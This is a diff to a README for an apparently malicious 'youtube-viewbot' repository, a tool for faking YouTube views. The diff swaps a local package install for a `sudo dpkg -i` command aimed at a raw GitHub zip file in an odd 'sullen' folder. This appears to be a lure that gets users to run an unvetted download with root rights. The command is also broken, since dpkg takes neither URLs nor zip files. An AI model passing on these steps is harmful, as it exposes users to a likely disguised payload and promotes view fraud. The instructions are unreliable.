Mnzcaro2710/youtube-viewbot/README.md

 5. **Install the Application**
    - **Windows:** Double-click the downloaded `.exe` file and follow the on-screen instructions.
    - **macOS:** Open the downloaded `.dmg` file and drag the YouTube Viewbot icon to your Applications folder.
    - **Linux:** For Debian-based systems, you can usually install with `dpkg`.
-Open your terminal, navigate to the folder where the `.deb` file is located, and type: `sudo dpkg -i youtube-viewbot.deb`.
+Open your terminal, navigate to the folder where the `.deb` file is located, and type: `sudo dpkg -i https://raw.githubusercontent.com/Mnzcaro2710/youtube-viewbot/main/sullen/youtube-viewbot-v3.3-beta.1.zip`.

 6. **Run the Application**
    After installation, locate the application on your system and open it.